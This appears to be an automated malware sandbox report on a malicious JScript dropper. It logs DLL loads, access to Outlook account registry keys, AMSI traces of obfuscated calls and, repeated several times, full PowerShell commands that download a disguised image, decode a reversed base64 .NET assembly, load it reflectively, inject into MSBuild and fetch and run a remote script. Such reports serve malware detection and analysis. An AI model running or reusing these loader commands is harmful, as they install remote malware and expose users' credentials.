Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\8375.js.csv");IXMLDOMNode._0000003d("false");IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:64 o: f:loadXML a0:%22%3Cpsf%3APrintTicket%20xmlns%3Apsf%3D%22http%3A%2F%2Fschemas.microsoft.com%2Fwindows%2F2003%2F08%2Fprinting%2Fprintschemaframework%22%20xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema-");IXMLDOMNode._0000003f("<psf:PrintTicket xmlns:psf="http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:psf2="http://schemas.microsoft.com/windows/2013/12/printing/p");IXMLDOMNode._00000000();ITextStream.WriteLine(" exit:64 o: f:loadXML r:true");IXMLDOMNode._0000003b();IXMLDOMParseError.errorCode();IXMLDOMNode._00000000();ITextStream.WriteLine(" entry:97 o: f:setProperty a0:%22SelectionNamespaces%22 a1:%22xmlns%3Apsf%3D'http%3A%2F%2Fschemas.microsoft.com%2Fwindows%2F2003%2F08%2Fprinting%2Fprintschemaframework'%20xmlns%3Apsf2%3D'http%3A%2F%2Fschemas.microsoft.com%2Fw");IXMLDOMNode._000000cc("SelectionNamespaces", "xmlns:psf='http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework' xmlns:psf2='http://sche");IXMLDOMNode._00000000();ITextStream.WriteLine(" exit:97 o: f:setProperty r:undefined");IXMLDOMNode._00000028();ITextStream.WriteLine(" entry:621 f:");ITextStream.WriteLine(" exec:624 f:");ITextStream.WriteLine(" exit:621 f: r:function%20peating(stream%2C%20insurable%2C%20length%2C%20tag%2C%20sub)");ITextStream.WriteLine(" entry:3295 f:");ITextStream.WriteLine(" exec:3298 f:");ITextStream.WriteLine(" exit:3295 f: r:function%20(name%2C%20plumbings)");ITextStream.WriteLine(" entry:6192 f:");ITextStream.WriteLine(" exec:6195 f:");ITextStream.WriteLine(" exit:6192 f: r:function%20(chlorine)");ITextStream.WriteLine(" entry:7957 f:");ITextStream.WriteLine(" exec:7960 f:");ITextStream.WriteLine(" exit:7957 f: r:function%20Int10(value)");ITextStream.WriteLine(" entry:8667 f:");ITextStream.WriteLine(" exec:8670 f:");ITextStream.WriteLine(" exit:8667 f: r:function%20(fname%2C%20plumbings)");ITextStream.WriteLine(" entry:9221 f:");ITextStream.WriteLine(" exec:9222 f:");ITextStream.WriteLine(" exit:9221 f: r:undefined");ITextStream.WriteLine(" entry:9412 f: a0:");ITextStream.WriteLine(" exec:9415 f:");ITextStream.WriteLine(" exit:9412 f: r:function%20(options)");ITextStream.WriteLine(" entry:9818 f:");ITextStream.WriteLine(" exec:9821 f:");ITextStream.WriteLine(" exit:9818 f: r:function%20(data)");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:10336 o: f:open a0:%22GET%22 a1:%22https%3A%2F%2Fpaste.ee%2Fd%2FsnSm4%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/snSm4", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:10336 o: f:open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:10345 o: f:send");IServerXMLHTTPRequest2.send();misbecum = { emandibulate: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IWshShell3.Run("powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTabl", "0", "false")

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

12_2_004044A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044693D push ecx; ret	12_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044DB70 push eax; ret	12_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0044DB70 push eax; ret	12_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_00451D54 push eax; ret	12_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044B090 push eax; ret	13_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044B090 push eax; ret	13_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00444E71 push ecx; ret	13_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00414060 push eax; ret	15_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00414060 push eax; ret	15_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00414039 push ecx; ret	15_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004164EB push 0000006Ah; retf	15_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00416553 push 0000006Ah; retf	15_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00416555 push 0000006Ah; retf	15_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00434006 push ecx; ret	27_2_00434019
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004567F0 push eax; ret	27_2_0045680E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0045B9DD push esi; ret	27_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00455EBF push ecx; ret	27_2_00455ED2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00406128 ShellExecuteW,URLDownloadToFileW,

27_2_00406128

Boot Survival

